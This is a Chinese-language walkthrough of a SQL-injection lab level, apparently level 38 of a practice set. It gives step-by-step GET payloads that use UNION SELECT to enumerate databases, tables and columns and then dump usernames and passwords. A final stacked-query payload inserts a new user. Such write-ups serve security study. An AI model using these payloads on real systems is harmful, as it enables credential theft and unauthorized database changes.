第三十八关请求方式为GET请求 , 注入类型为 单引号字符串型注入
第一步,测试注入方式
?id=1' and false-- a
SQL不成立时 , 结果不显示 , 固 单引号字符串型注入 , 源码如下
本题的重点在 mysqli_multi_query() , 可同时执行多条SQL , 即叠加注入
第二步,判断字段数
使用order by 排序 测试字段数量
?id=1' order by 4 -- a
从第1列开始测试 , 直至报错 , 第4列开始异常 固 字段数为3
第三步,判断显示位置
使用 union 联合查询 测试字段显示的位置
?id=-1' union select 1,2,3 -- a
此处 id=-1 , 由于id不能为负数 , 所以该SQL查询不到用户数据 , 返回的结果就只有 联合查询的 1 2 3 这一条数据 , 目的在于方便展示字段显示位置
第四步,获取所有数据库
查询information_schema默认数据库的schemata表的schema_name字段 , 该字段保存了所有的数据库名
?id=-1' union select 1,2, (select group_concat(schema_name) from information_schema.schemata) -- a
此处的 group_concat() , 可以将多行数据 合并为一行
下一步 , 根据 security 数据库 , 获取其所有表
第五步,获取所有表
查询information_schema默认数据库的tables表的table_name字段 , 该字段保存了所有的表名
?id=-1' union select 1,2, (select group_concat(table_name) from information_schema.tables where table_schema='security') -- a
users表为用户表 , 下一步根据users表获取其所有字段
第六步,获取所有字段
查询information_schema默认数据库的columns表的column_name字段 , 该字段保存了所以的字段名
?id=-1' union select 1,2, (select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') -- a
至此可知 , 数据库 security, 表 users, 字段 id,users,password , 下一步 ,根据此信息查询账号和密码
第七步,获取账号密码
?id=-1' union select 1,2, (select group_concat(username,'~',password) from users) -- a
第八步,叠加注入
利用该关卡的SQL的 mysqli_multi_query() , 同时执行多条SQL , 实现插入用户
?id=-1' ; insert into users(id,username,password) values(20,'zhangsan','123') -- a
访问新增的用户 id为20
